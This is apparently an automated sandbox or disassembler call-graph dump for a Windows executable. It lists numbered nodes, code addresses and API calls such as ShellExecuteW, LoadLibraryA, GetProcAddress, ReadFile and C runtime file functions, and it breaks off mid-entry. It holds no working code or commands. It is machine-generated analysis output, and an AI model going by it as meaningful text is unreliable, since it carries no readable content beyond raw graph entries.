SetCurrentDirectoryW 86568->86571 86569 40d64c 86741 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86569->86741 86570->86569 86818 432fee 6 API calls 86570->86818 86571->86570 86574 42e252 86574->86569 86576 42e25a GetModuleFileNameW 86574->86576 86578 42e274 86576->86578 86579 42e2cb GetForegroundWindow ShellExecuteW 86576->86579 86819 401b10 86578->86819 86583 40d688 86579->86583 86580 40d656 86582 40d669 86580->86582 86815 40e0c0 74 API calls setSBUpLow 86580->86815 86749 4091e0 86582->86749 86587 40d692 SetCurrentDirectoryW 86583->86587 86587->86469 86590 42e28d 86826 40d200 52 API calls 2 library calls 86590->86826 86593 42e299 GetForegroundWindow ShellExecuteW 86594 42e2c6 86593->86594 86594->86583 86595 40ec00 LoadLibraryA GetProcAddress 86595->86463 86597 40d72e 86596->86597 86598 40ebd6 LoadLibraryA 86596->86598 86597->86463 86597->86595 86598->86597 86599 40ebe7 GetProcAddress 86598->86599 86599->86597 86601 4182e0 86600->86601 86602 4182f3 EnterCriticalSection 86600->86602 86608 418209 86601->86608 86602->86545 86604 4182e6 86604->86602 86635 411924 46 API calls 3 library calls 86604->86635 86607->86547 86609 418215 __wfsopen 86608->86609 86610 418225 86609->86610 86611 41823d 86609->86611 86636 418901 46 API calls 2 library calls 86610->86636 86613 416b04 __malloc_crt 45 API calls 86611->86613 86619 41824b __wfsopen 86611->86619 86615 418256 86613->86615 86614 41822a 86637 418752 46 API calls 9 library calls 86614->86637 86617 41825d 86615->86617 86618 41826c 86615->86618 86639 417f77 46 API calls __getptd_noexit 86617->86639 86623 4182cb __lock 45 API calls 86618->86623 86619->86604 86620 418231 86638 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86620->86638 86625 418273 86623->86625 86626 4182a6 86625->86626 86627 41827b InitializeCriticalSectionAndSpinCount 86625->86627 86628 413748 _free 45 API calls 86626->86628 86629 418297 86627->86629 86630 41828b 86627->86630 86628->86629 86641 4182c2 LeaveCriticalSection _doexit 86629->86641 86631 413748 _free 45 API calls 86630->86631 86632 418291 86631->86632 86640 417f77 46 API calls __getptd_noexit 86632->86640 86636->86614 86637->86620 86639->86619 86640->86629 86641->86619 86642->86552 86643->86554 86827 40e6e0 86644->86827 86648 401f41 GetModuleFileNameW 86845 410100 86648->86845 86650 401f5c 86857 410960 86650->86857 86653 401b10 52 API calls 86654 401f81 86653->86654 86860 401980 86654->86860 86656 401f8e 86657 408f40 VariantClear 86656->86657 86658 401f9d 86657->86658 86659 401b10 52 API calls 86658->86659 86660 401fb4 86659->86660 86661 401980 53 API calls 86660->86661 86662 401fc3 86661->86662 86663 401b10 52 API calls 86662->86663 86664 401fd2 86663->86664 86868 40c2c0 86664->86868 86666 401fe1 86667 40bc70 52 API calls 86666->86667 86668 401ff3 86667->86668 86886 401a10 86668->86886 86670 401ffe 86893 4114ab 86670->86893 86673 428b05 86675 401a10 52 API calls 86673->86675 86674 402017 86676 4114ab __wcsicoll 58 API calls 86674->86676 86677 428b18 86675->86677 86678 402022 86676->86678 86680 401a10 52 API calls 86677->86680 86678->86677 86679 40202d 86678->86679 86681 4114ab __wcsicoll 58 API calls 86679->86681 86682 428b33 86680->86682 86683 402038 86681->86683 86685 428b3b GetModuleFileNameW 86682->86685 86684 402043 86683->86684 86683->86685 86686 4114ab __wcsicoll 58 API calls 86684->86686 86687 401a10 52 API calls 86685->86687 86688 40204e 86686->86688 86689 428b6c 86687->86689 86690 402092 86688->86690 86693 428b90 _wcscpy 86688->86693 86696 401a10 52 API calls 86688->86696 86691 40e0a0 52 API calls 86689->86691 86692 4020a3 86690->86692 86690->86693 86694 428b7a 86691->86694 86695 428bc6 86692->86695 86901 40e830 53 API calls 86692->86901 86701 401a10 52 API calls 86693->86701 86697 401a10 52 API calls 86694->86697 86699 402073 _wcscpy 86696->86699 86700 428b88 86697->86700 86705 401a10 52 API calls 86699->86705 86700->86693 86709 4020d0 86701->86709 86702 4020bb 86902 40cf00 53 API calls 86702->86902 86704 4020c6 86706 408f40 VariantClear 86704->86706 86705->86690 86706->86709 86707 402110 86711 408f40 VariantClear 86707->86711 86709->86707 86712 401a10 52 API calls 86709->86712 86903 40cf00 53 API calls 86709->86903 86904 40e6a0 53 API calls 86709->86904 86713 402120 moneypunct 86711->86713 86712->86709 86713->86558 86715 4295c9 setSBUpLow 86714->86715 86716 40f53c 86714->86716 86719 4295d9 GetOpenFileNameW 86715->86719 87584 410120 86716->87584 86718 40f545 87588 4102b0 SHGetMalloc 86718->87588 86719->86716 86721 40d5f5 86719->86721 86721->86566 86721->86568 86722 40f54c 87593 410190 GetFullPathNameW 86722->87593 86724 40f559 87604 40f570 86724->87604 87666 402400 86726->87666 86728 40146f 86730 428c29 _wcscat 86728->86730 87675 401500 86728->87675 86731 40147c 86731->86730 87683 40d440 86731->87683 86733 401489 86733->86730 86734 401491 GetFullPathNameW 86733->86734 86735 402160 52 API calls 86734->86735 86736 4014bb 86735->86736 86737 402160 52 API calls 86736->86737 86738 4014c8 86737->86738 86738->86730 86739 402160 52 API calls 86738->86739 86740 4014ee 86739->86740 86740->86568 86742 428361 86741->86742 86743 4103fc LoadImageW RegisterClassExW 86741->86743 87754 44395e EnumResourceNamesW LoadImageW 86742->87754 87753 410490 7 API calls 86743->87753 86746 40d651 86748 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86746->86748 86747 428368 86748->86580 86750 409202 86749->86750 86751 42d7ad 86749->86751 86808 409216 moneypunct 86750->86808 87891 410940 338 API calls 86750->87891 87894 45e737 90 API calls 3 library calls 86751->87894 86754 409386 86755 40939c 86754->86755 87892 40f190 10 API calls 86754->87892 86755->86583 86816 401000 Shell_NotifyIconW setSBUpLow 86755->86816 86757 4095b2 86757->86755 86759 4095bf 86757->86759 86758 409253 PeekMessageW 86758->86808 87893 401a50 338 API calls 86759->87893 86761 42d8cd Sleep 86761->86808 86762 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86762->86755 86765 4095f9 86762->86765 86764 42e13b 87912 40d410 VariantClear 86764->87912 86768 42e158 TranslateMessage DispatchMessageW GetMessageW 86765->86768 86768->86768 86769 42e188 86768->86769 86769->86755 86771 409567 PeekMessageW 86771->86808 86773 44c29d 52 API calls 86814 4094e0 86773->86814 86774 46f3c1 107 API calls 86774->86808 86775 40e0a0 52 API calls 86775->86808 86776 46fdbf 108 API calls 86776->86814 86778 42dcd2 WaitForSingleObject 86782 42dcf0 GetExitCodeProcess CloseHandle 86778->86782 86778->86808 86779 409551 TranslateMessage DispatchMessageW 86779->86771 86780 42dd3d Sleep 86780->86814 86781 47d33e 316 API calls 86781->86808 87901 40d410 VariantClear 86782->87901 86785 4094cf Sleep 86785->86814 86787 40d410 VariantClear 86787->86808 86789 42d94d timeGetTime 87897 465124 53 API calls 86789->87897 86791 40c620 timeGetTime 86791->86814 86794 465124 53 API calls 86794->86814 86795 42dd89 CloseHandle 86795->86814 86796 408f40 VariantClear 86796->86814 86798 42de19 GetExitCodeProcess CloseHandle 86798->86814 86800 401b10 52 API calls 86800->86814 86802 42de88 Sleep 86802->86808 86805 401980 53 API calls 86805->86814 86808->86754 86808->86758 86808->86761 86808->86764 86808->86771 86808->86774 86808->86775 86808->86778 86808->86779 86808->86780 86808->86781 86808->86785 86808->86787 86808->86789 86809 42e0cc VariantClear 86808->86809 86810 408f40 VariantClear 86808->86810 86811 45e737 90 API calls 86808->86811 86808->86814 87755 4091b0 86808->87755 87813 40afa0 86808->87813 87839 408fc0 86808->87839 87874 408cc0 86808->87874 87888 4096a0 338 API calls 4 library calls 86808->87888 87889 40d150 TranslateAcceleratorW 86808->87889 87890 40d170 IsDialogMessageW GetClassLongW 86808->87890 87895 465124 53 API calls 86808->87895 87896 40c620 timeGetTime 86808->87896 87911 40e270 VariantClear moneypunct 86808->87911 86809->86808 86810->86808 86811->86808 86814->86773 86814->86776 86814->86791 86814->86794 86814->86795 86814->86796 86814->86798 86814->86800 86814->86802 86814->86805 86814->86808 87898 45178a 54 API calls 86814->87898 87899 47d33e 338 API calls 86814->87899 87900 453bc6 54 API calls 86814->87900 87902 40d410 VariantClear 86814->87902 87903 443d19 67 API calls _wcslen 86814->87903 87904 4574b4 VariantClear 86814->87904 87905 403cd0 86814->87905 87909 4731e1 VariantClear 86814->87909 87910 4331a2 6 API calls 86814->87910 86815->86582 86816->86583 86817->86568 86818->86574 86820 401b16 _wcslen 86819->86820 86821 401b63 86820->86821 86822 4115d7 52 API calls 86820->86822 86825 40d200 52 API calls 2 library calls 86821->86825 86823 401b4b _memmove 86822->86823 86824 4115d7 52 API calls 86823->86824 86824->86821 86825->86590 86826->86593 86828 40bc70 52 API calls 86827->86828 86829 401f31 86828->86829 86830 402560 86829->86830 86831 40256d __write_nolock 86830->86831 86832 402160 52 API calls 86831->86832 86834 402593 86832->86834 86844 4025bd 86834->86844 86905 401c90 86834->86905 86835 4026f0 52 API calls 86835->86844 86836 4026a7 86837 401b10 52 API calls 86836->86837 86843 4026db 86836->86843 86839 4026d1 86837->86839 86838 401b10 52 API calls 86838->86844 86909 40d7c0 52 API calls 2 library calls 86839->86909 86840 401c90 52 API calls 86840->86844 86843->86648 86844->86835 86844->86836 86844->86838 86844->86840 86908 40d7c0 52 API calls 2 library calls 86844->86908 86910 40f760 86845->86910 86848 410118 86848->86650 86850 42805d 86851 42806a 86850->86851 86966 431e58 86850->86966 86852 413748 _free 46 API calls 86851->86852 86854 428078 86852->86854 86855 431e58 82 API calls 86854->86855 86856 428084 86855->86856 86856->86650 86858 4115d7 52 API calls 86857->86858 86859 401f74 86858->86859 86859->86653 86861 4019a3 86860->86861 86865 401985 86860->86865 86862 4019b8 86861->86862 86861->86865 87573 403e10 53 API calls 86862->87573 86864 40199f 86864->86656 86865->86864 87572 403e10 53 API calls 86865->87572 86867 4019c4 86867->86656 86869 40c2c7 86868->86869 86870 40c30e 86868->86870 86871 40c2d3 86869->86871 86872 426c79 86869->86872 86873 40c315 86870->86873 86874 426c2b 86870->86874 87574 403ea0 52 API calls __cinit 86871->87574 87579 4534e3 52 API calls 86872->87579 86875 40c321 86873->86875 86876 426c5a 86873->86876 86878 426c4b 86874->86878 86879 426c2e 86874->86879 87575 403ea0 52 API calls __cinit 86875->87575 87578 4534e3 52 API calls 86876->87578 87577 4534e3 52 API calls 86878->87577 86885 40c2de 86879->86885 87576 4534e3 52 API calls 86879->87576 86885->86666 86887 401a30 86886->86887 86888 401a17 86886->86888 86890 402160 52 API calls 86887->86890 86889 401a2d 86888->86889 87580 403c30 52 API calls _memmove 86888->87580 86889->86670 86892 401a3d 86890->86892 86892->86670 86894 411523 86893->86894 86895 4114ba 86893->86895 87583 4113a8 58 API calls 3 library calls 86894->87583 86900 40200c 86895->86900 87581 417f77 46 API calls __getptd_noexit 86895->87581 86898 4114c6 87582 417f25 10 API calls __snwprintf 86898->87582 86900->86673 86900->86674 86901->86702 86902->86704 86903->86709 86904->86709 86906 4026f0 52 API calls 86905->86906 86907 401c97 86906->86907 86907->86834 86908->86844 86909->86843 86970 40f6f0 86910->86970 86912 40f77b _strcat moneypunct 86978 40f850 86912->86978 86917 427c2a 87008 414d04 86917->87008 86919 40f7fc 86919->86917 86920 40f804 86919->86920 86995 414a46 86920->86995 86924 40f80e 86924->86848 86929 4528bd 86924->86929 86926 427c59 87014 414fe2 86926->87014 86928 427c79 86930 4150d1 _fseek 81 API calls 86929->86930 86931 452930 86930->86931 87514 452719 86931->87514 86934 452948 86934->86850 86935 414d04 __fread_nolock 61 API calls 86936 452966 86935->86936 86937 414d04 __fread_nolock 61 API calls 86936->86937 86938 452976 86937->86938 86939 414d04 __fread_nolock 61 API calls 86938->86939 86940 45298f 86939->86940 86941 414d04 __fread_nolock 61 API calls 86940->86941 86942 4529aa 86941->86942 86943 4150d1 _fseek 81 API calls 86942->86943 86944 4529c4 86943->86944 86945 4135bb _malloc 46 API calls 86944->86945 86946 4529cf 86945->86946 86947 4135bb _malloc 46 API calls 86946->86947 86948 4529db 86947->86948 86949 414d04 __fread_nolock 61 API calls 86948->86949 86950 4529ec 86949->86950 86951 44afef GetSystemTimeAsFileTime 86950->86951 86952 452a00 86951->86952 86953 452a36 86952->86953 86954 452a13 86952->86954 86956 452aa5 86953->86956 86957 452a3c 86953->86957 86955 413748 _free 46 API calls 86954->86955 86960 452a1c 86955->86960 86959 413748 _free 46 API calls 86956->86959 87520 44b1a9 86957->87520 86962 452aa3 86959->86962 86963 413748 _free 46 API calls 86960->86963 86961 452a9d 86964 413748 _free 46 API calls 86961->86964 86962->86850 86965 452a25 86963->86965 86964->86962 86965->86850 86967 431e64 86966->86967 86969 431e6a 86966->86969 86968 414a46 __fcloseall 82 API calls 86967->86968 86968->86969 86969->86851 86971 425de2 86970->86971 86972 40f6fc _wcslen 86970->86972 86971->86912 86973 40f710 WideCharToMultiByte 86972->86973 86974 40f756 86973->86974 86975 40f728 86973->86975 86974->86912 86976 4115d7 52 API calls 86975->86976 86977 40f735 WideCharToMultiByte 86976->86977 86977->86912 86980 40f85d setSBUpLow _strlen 86978->86980 86979 426b3b 86980->86979 86982 40f7ab 86980->86982 87027 414db8 86980->87027 86983 4149c2 86982->86983 87042 414904 86983->87042 86985 40f7e9 86985->86917 86986 40f5c0 86985->86986 86991 40f5cd _strcat __write_nolock _memmove 86986->86991 86987 414d04 __fread_nolock 61 API calls 86987->86991 86989 425d11 86990 4150d1 _fseek 81 API calls 86989->86990 86992 425d33 86990->86992 86991->86987 86991->86989 86994 40f691 __tzset_nolock 86991->86994 87130 4150d1 86991->87130 86993 414d04 __fread_nolock 61 API calls 86992->86993 86993->86994 86994->86919 86996 414a52 __wfsopen 86995->86996 86997 414a64 86996->86997 86998 414a79 86996->86998 87270 417f77 46 API calls __getptd_noexit 86997->87270 87000 415471 __lock_file 47 API calls 86998->87000 87005 414a74 __wfsopen 86998->87005 87002 414a92 87000->87002 87001 414a69 87271 417f25 10 API calls __snwprintf 87001->87271 87254 4149d9 87002->87254 87005->86924 87339 414c76 87008->87339 87010 414d1c 87011 44afef 87010->87011 87507 442c5a 87011->87507 87013 44b00d 87013->86926 87015 414fee __wfsopen 87014->87015 87016 414ffa 87015->87016 87017 41500f 87015->87017 87511 417f77 46 API calls __getptd_noexit 87016->87511 87018 415471 __lock_file 47 API calls 87017->87018 87021 415017 87018->87021 87020 414fff 87512 417f25 10 API calls __snwprintf 87020->87512 87023 414e4e __ftell_nolock 51 API calls 87021->87023 87024 415024 87023->87024 87513 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87024->87513 87026 41500a __wfsopen 87026->86928 87028 414dd6 87027->87028 87029 414deb 87027->87029 87038 417f77 46 API calls __getptd_noexit 87028->87038 87029->87028 87030 414df2 87029->87030 87040 41b91b 79 API calls 11 library calls 87030->87040 87033 414ddb 87039 417f25 10 API calls __snwprintf 87033->87039 87035 414e18 87036 414de6 87035->87036 87041 418f98 77 API calls 7 library calls 87035->87041 87036->86980 87038->87033 87039->87036 87040->87035 87041->87036 87045 414910 __wfsopen 87042->87045 87043 414923 87098 417f77 46 API calls __getptd_noexit 87043->87098 87045->87043 87047 414951 87045->87047 87046 414928 87099 417f25 10 API calls __snwprintf 87046->87099 87061 41d4d1 87047->87061 87050 414956 87051 41496a 87050->87051 87052 41495d 87050->87052 87054 414992 87051->87054 87055 414972 87051->87055 87100 417f77 46 API calls __getptd_noexit 87052->87100 87078 41d218 87054->87078 87101 417f77 46 API calls __getptd_noexit 87055->87101 87056 414933 __wfsopen @_EH4_CallFilterFunc@8 87056->86985 87062 41d4dd __wfsopen 87061->87062 87063 4182cb __lock 46 API calls 87062->87063 87076 41d4eb 87063->87076 87064 41d560 87103 41d5fb 87064->87103 87065 41d567 87067 416b04 __malloc_crt 46 API calls 87065->87067 87069 41d56e 87067->87069 87068 41d5f0 __wfsopen 87068->87050 87069->87064 87070 41d57c InitializeCriticalSectionAndSpinCount 87069->87070 87071 41d59c 87070->87071 87072 41d5af EnterCriticalSection 87070->87072 87075 413748 _free 46 API calls 87071->87075 87072->87064 87073 418209 __mtinitlocknum 46 API calls 87073->87076 87075->87064 87076->87064 87076->87065 87076->87073 87106 4154b2 47 API calls __lock 87076->87106 87107 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87076->87107 87079 41d23a 87078->87079 87080 41d255 87079->87080 87091 41d26c __wopenfile 87079->87091 87112 417f77 46 API calls __getptd_noexit 87080->87112 87082 41d25a 87113 417f25 10 API calls __snwprintf 87082->87113 87083 41d47a 87117 417f77 46 API calls __getptd_noexit 87083->87117 87084 41d48c 87109 422bf9 87084->87109 87088 41d47f 87118 417f25 10 API calls __snwprintf 87088->87118 87090 41499d 87102 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87090->87102 87091->87083 87097 41d421 87091->87097 87114 41341f 58 API calls 2 library calls 87091->87114 87093 41d41a 87093->87097 87115 41341f 58 API calls 2 library calls 87093->87115 87095 41d439 87095->87097 87116 41341f 58 API calls 2 library calls 87095->87116 87097->87083 87097->87084 87098->87046 87099->87056 87100->87056 87101->87056 87102->87056 87108 4181f2 LeaveCriticalSection 87103->87108 87105 41d602 87105->87068 87106->87076 87107->87076 87108->87105 87119 422b35 87109->87119 87111 422c14 87111->87090 87112->87082 87113->87090 87114->87093 87115->87095 87116->87097 87117->87088 87118->87090 87121 422b41 __wfsopen 87119->87121 87120 422b54 87122 417f77 __snwprintf 46 API calls 87120->87122 87121->87120 87124 422b8a 87121->87124 87123 422b59 87122->87123 87125 417f25 __snwprintf 10 API calls 87123->87125 87126 422400 __tsopen_nolock 109 API calls 87124->87126 87129 422b63 __wfsopen 87125->87129 87127 422ba4 87126->87127 87128 422bcb __wsopen_helper LeaveCriticalSection 87127->87128 87128->87129 87129->87111 87131 4150dd __wfsopen 87130->87131 87132 4150e9 87131->87132 87133 41510f 87131->87133 87161 417f77 46 API calls __getptd_noexit 87132->87161 87143 415471 87133->87143 87136 4150ee 87162 417f25 10 API calls __snwprintf 87136->87162 87142 4150f9 __wfsopen 87142->86991 87144 415483 87143->87144 87145 4154a5 EnterCriticalSection 87143->87145 87144->87145 87146 41548b 87144->87146 87147 415117 87145->87147 87148 4182cb __lock 46 API calls 87146->87148 87149 415047 87147->87149 87148->87147 87150 415067 87149->87150 87151 415057 87149->87151 87156 415079 87150->87156 87164 414e4e 87150->87164 87219 417f77 46 API calls __getptd_noexit 87151->87219 87155 41505c 87163 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87155->87163 87181 41443c 87156->87181 87159 4150b9 87194 41e1f4 87159->87194 87161->87136 87162->87142 87163->87142 87165 414e61 87164->87165 87166 414e79 87164->87166 87220 417f77 46 API calls __getptd_noexit 87165->87220 87168 414139 __ftell_nolock 46 API calls 87166->87168 87170 414e80 87168->87170 87169 414e66 87221 417f25 10 API calls __snwprintf 87169->87221 87172 41e1f4 __write 51 API calls 87170->87172 87173 414e97 87172->87173 87174 414f09 87173->87174 87176 414ec9 87173->87176 87180 414e71 87173->87180 87222 417f77 46 API calls __getptd_noexit 87174->87222 87177 41e1f4 __write 51 API calls 87176->87177 87176->87180 87178 414f64 87177->87178 87179 41e1f4 __write 51 API calls 87178->87179 87178->87180 87179->87180 87180->87156 87182 414455 87181->87182 87186 414477 87181->87186 87183 414139 __ftell_nolock 46 API calls 87182->87183 87182->87186 87184 414470 87183->87184 87223 41b7b2 77 API calls 6 library calls 87184->87223 87187 414139 87186->87187 87188 414145 87187->87188 87189 41415a 87187->87189 87224 417f77 46 API calls __getptd_noexit 87188->87224 87189->87159 87191 41414a 87225 417f25 10 API calls __snwprintf 87191->87225 87193 414155 87193->87159 87195 41e200 __wfsopen 87194->87195 87196 41e223 87195->87196 87197 41e208 87195->87197 87199 41e22f 87196->87199 87202 41e269 87196->87202 87246 417f8a 46 API calls __getptd_noexit 87197->87246 87248 417f8a 46 API calls __getptd_noexit 87199->87248 87200 41e20d 87247 417f77 46 API calls __getptd_noexit 87200->87247 87226 41ae56 87202->87226 87204 41e234 87249 417f77 46 API calls __getptd_noexit 87204->87249 87207 41e26f 87209 41e291 87207->87209 87210 41e27d 87207->87210 87208 41e23c 87250 417f25 10 API calls __snwprintf 87208->87250 87251 417f77 46 API calls __getptd_noexit 87209->87251 87236 41e17f 87210->87236 87214 41e215 __wfsopen 87214->87155 87215 41e289 87253 41e2c0 LeaveCriticalSection __unlock_fhandle 87215->87253 87216 41e296 87252 417f8a 46 API calls __getptd_noexit 87216->87252 87219->87155 87220->87169 87221->87180 87222->87180 87223->87186 87224->87191 87225->87193 87227 41ae62 __wfsopen 87226->87227 87228 41aebc 87227->87228 87230 4182cb __lock 46 API calls 87227->87230 87229 41aec1 EnterCriticalSection 87228->87229 87231 41aede __wfsopen 87228->87231 87229->87231 87232 41ae8e 87230->87232 87231->87207 87233 41aeaa 87232->87233 87234 41ae97 InitializeCriticalSectionAndSpinCount 87232->87234 87235 41aeec ___lock_fhandle LeaveCriticalSection 87233->87235 87234->87233 87235->87228 87237 41aded __chsize_nolock 46 API calls 87236->87237 87238 41e18e 87237->87238 87239 41e1a4 SetFilePointer 87238->87239 87240 41e194 87238->87240 87242 41e1c3 87239->87242 87243 41e1bb GetLastError 87239->87243 87241 417f77 __snwprintf 46 API calls 87240->87241 87245 41e199 87241->87245 87244 417f9d __dosmaperr 46 API calls 87242->87244 87242->87245 87243->87242 87244->87245 87245->87215 87246->87200 87247->87214 87248->87204 87249->87208 87250->87214 87251->87216 87252->87215 87253->87214 87255 4149ea 87254->87255 87257 4149fe 87254->87257 87300 417f77 46 API calls __getptd_noexit 87255->87300 87258 4149fa 87257->87258 87259 41443c __flush 77 API calls 87257->87259 87272 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87258->87272 87261 414a0a 87259->87261 87260 4149ef 87301 417f25 10 API calls __snwprintf 87260->87301 87273 41d8c2 87261->87273 87265 414139 __ftell_nolock 46 API calls 87266 414a18 87265->87266 87277 41d7fe 87266->87277 87268 414a1e 87268->87258 87269 413748 _free 46 API calls 87268->87269 87269->87258 87270->87001 87271->87005 87272->87005 87274 41d8d2 87273->87274 87276 414a12 87273->87276 87275 413748 _free 46 API calls 87274->87275 87274->87276 87275->87276 87276->87265 87278 41d80a __wfsopen 87277->87278 87279 41d812 87278->87279 87280 41d82d 87278->87280 87317 417f8a 46 API calls __getptd_noexit 87279->87317 87281 41d839 87280->87281 87287 41d873 87280->87287 87319 417f8a 46 API calls __getptd_noexit 87281->87319 87283 41d817 87318 417f77 46 API calls __getptd_noexit 87283->87318 87286 41d83e 87320 417f77 46 API calls __getptd_noexit 87286->87320 87290 41ae56 ___lock_fhandle 48 API calls 87287->87290 87288 41d81f __wfsopen 87288->87268 87291 41d879 87290->87291 87293 41d893 87291->87293 87294 41d887 87291->87294 87292 41d846 87321 417f25 10 API calls __snwprintf 87292->87321 87322 417f77 46 API calls __getptd_noexit 87293->87322 87302 41d762 87294->87302 87298 41d88d 87323 41d8ba LeaveCriticalSection __unlock_fhandle 87298->87323 87300->87260 87301->87258 87324 41aded 87302->87324 87304 41d7c8 87337 41ad67 47 API calls 2 library calls 87304->87337 87306 41d772 87306->87304 87307 41aded __chsize_nolock 46 API calls 87306->87307 87316 41d7a6 87306->87316 87309 41d79d 87307->87309 87308 41aded __chsize_nolock 46 API calls 87310 41d7b2 CloseHandle 87308->87310 87313 41aded __chsize_nolock 46 API calls 87309->87313 87310->87304 87314 41d7be GetLastError 87310->87314 87311 41d7d0 87312 41d7f2 87311->87312 87338 417f9d 46 API calls 3 library calls 87311->87338 87312->87298 87313->87316 87314->87304 87316->87304 87316->87308 87317->87283 87318->87288 87319->87286 87320->87292 87321->87288 87322->87298 87323->87288 87325 41ae12 87324->87325 87326 41adfa 87324->87326 87328 417f8a __chsize_nolock 46 API calls 87325->87328 87331 41ae51 87325->87331 87327 417f8a __chsize_nolock 46 API calls 87326->87327 87329 41adff 87327->87329 87330 41ae23 87328->87330 87332 417f77 __snwprintf 46 API calls 87329->87332 87333 417f77 __snwprintf 46 API calls 87330->87333 87331->87306 87334 41ae07 87332->87334 87335 41ae2b 87333->87335 87334->87306 87336 417f25 __snwprintf 10 API calls 87335->87336 87336->87334 87337->87311 87338->87312 87340 414c82 __wfsopen 87339->87340 87341 414cc3 87340->87341 87342 414cbb __wfsopen 87340->87342 87345 414c96 setSBUpLow 87340->87345 87343 415471 __lock_file 47 API calls 87341->87343 87342->87010 87344 414ccb 87343->87344 87352 414aba 87344->87352 87366 417f77 46 API calls __getptd_noexit 87345->87366 87348 414cb0 87367 417f25 10 API calls __snwprintf 87348->87367 87356 414ad8 setSBUpLow 87352->87356 87359 414af2 87352->87359 87353 414ae2 87419 417f77 46 API calls __getptd_noexit 87353->87419 87355 414b2d 87355->87359 87360 414c38 setSBUpLow 87355->87360 87361 414139 __ftell_nolock 46 API calls 87355->87361 87369 41dfcc 87355->87369 87399 41d8f3 87355->87399 87421 41e0c2 46 API calls 3 library calls 87355->87421 87356->87353 87356->87355 87356->87359 87368 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87359->87368 87422 417f77 46 API calls __getptd_noexit 87360->87422 87361->87355 87365 414ae7 87420 417f25 10 API calls __snwprintf 87365->87420 87366->87348 87367->87342 87368->87342 87370 41dfd8 __wfsopen 87369->87370 87371 41dfe0 87370->87371 87372 41dffb 87370->87372 87492 417f8a 46 API calls __getptd_noexit 87371->87492 87373 41e007 87372->87373 87379 41e041 87372->87379 87494 417f8a 46 API calls __getptd_noexit 87373->87494 87375 41dfe5 87493 417f77 46 API calls __getptd_noexit 87375->87493 87378 41e00c 87495 417f77 46 API calls __getptd_noexit 87378->87495 87380 41e063 87379->87380 87381 41e04e 87379->87381 87385 41ae56 ___lock_fhandle 48 API calls 87380->87385 87497 417f8a 46 API calls __getptd_noexit 87381->87497 87382 41dfed __wfsopen 87382->87355 87388 41e069 87385->87388 87386 41e014 87496 417f25 10 API calls __snwprintf 87386->87496 87387 41e053 87498 417f77 46 API calls __getptd_noexit 87387->87498 87390 41e077 87388->87390 87391 41e08b 87388->87391 87423 41da15 87390->87423 87499 417f77 46 API calls __getptd_noexit 87391->87499 87395 41e083 87501 41e0ba LeaveCriticalSection __unlock_fhandle 87395->87501 87396 41e090 87500 417f8a 46 API calls __getptd_noexit 87396->87500 87400 41d900 87399->87400 87404 41d915 87399->87404 87505 417f77 46 API calls __getptd_noexit 87400->87505 87402 41d905 87506 417f25 10 API calls __snwprintf 87402->87506 87405 41d94a 87404->87405 87410 41d910 87404->87410 87502 420603 87404->87502 87407 414139 __ftell_nolock 46 API calls 87405->87407 87408 41d95e 87407->87408 87409 41dfcc __read 59 API calls 87408->87409 87411 41d965 87409->87411 87410->87355 87411->87410 87412 414139 __ftell_nolock 46 API calls 87411->87412 87413 41d988 87412->87413 87413->87410 87414 414139 __ftell_nolock 46 API calls 87413->87414 87415 41d994 87414->87415 87415->87410 87416 414139 __ftell_nolock 46 API calls 87415->87416 87417 41d9a1 87416->87417 87418 414139 __ftell_nolock 46 API calls 87417->87418 87418->87410 87419->87365 87420->87359 87421->87355 87422->87365 87424 41da31 87423->87424 87425 41da4c 87423->87425 87427 417f8a __chsize_nolock 46 API calls 87424->87427 87426 41da5b 87425->87426 87429 41da7a 87425->87429 87430 417f8a __chsize_nolock 46 API calls 87426->87430 87428 41da36 87427->87428 87431 417f77 __snwprintf 46 API calls 87428->87431 87433 41da98 87429->87433 87444 41daac 87429->87444 87432 41da60 87430->87432 87445 41da3e 87431->87445 87435 417f77 __snwprintf 46 API calls 87432->87435 87436 417f8a __chsize_nolock 46 API calls 87433->87436 87434 41db02 87438 417f8a __chsize_nolock 46 API calls 87434->87438 87437 41da67 87435->87437 87439 41da9d 87436->87439 87441 417f25 __snwprintf 10 API calls 87437->87441 87442 41db07 87438->87442 87440 417f77 __snwprintf 46 API calls 87439->87440 87443 41daa4 87440->87443 87441->87445 87446 417f77 __snwprintf 46 API calls 87442->87446 87447 417f25 __snwprintf 10 API calls 87443->87447 87444->87434 87444->87445 87448 41dae1 87444->87448 87449 41db1b 87444->87449 87445->87395 87446->87443 87447->87445 87448->87434 87452 41daec ReadFile 87448->87452 87451 416b04 __malloc_crt 46 API calls 87449->87451 87453 41db31 87451->87453 87454 41dc17 87452->87454 87455 41df8f GetLastError 87452->87455 87458 41db59 87453->87458 87459 41db3b 87453->87459 87454->87455 87463 41dc2b 87454->87463 87456 41de16 87455->87456 87457 41df9c 87455->87457 87467 417f9d __dosmaperr 46 API calls 87456->87467 87471 41dd9b 87456->87471 87461 417f77 __snwprintf 46 API calls 87457->87461 87460 420494 __lseeki64_nolock 48 API calls 87458->87460 87462 417f77 __snwprintf 46 API calls 87459->87462 87464 41db67 87460->87464 87465 41dfa1 87461->87465 87466 41db40 87462->87466 87463->87471 87472 41dc47 87463->87472 87475 41de5b 87463->87475 87464->87452 87468 417f8a __chsize_nolock 46 API calls 87465->87468 87469 417f8a __chsize_nolock 46 API calls 87466->87469 87467->87471 87468->87471 87469->87445 87470 413748 _free 46 API calls 87470->87445 87471->87445 87471->87470 87473 41dcab ReadFile 87472->87473 87480 41dd28 87472->87480 87478 41dcc9 GetLastError 87473->87478 87483 41dcd3 87473->87483 87474 41ded0 ReadFile 87476 41deef GetLastError 87474->87476 87484 41def9 87474->87484 87475->87471 87475->87474 87476->87475 87476->87484 87477 41ddec MultiByteToWideChar 87477->87471 87479 41de10 GetLastError 87477->87479 87478->87472 87478->87483 87479->87456 87480->87471 87481 41dda3 87480->87481 87482 41dd96 87480->87482 87486 41dd60 87480->87486 87481->87486 87487 41ddda 87481->87487 87485 417f77 __snwprintf 46 API calls 87482->87485 87483->87472 87488 420494 __lseeki64_nolock 48 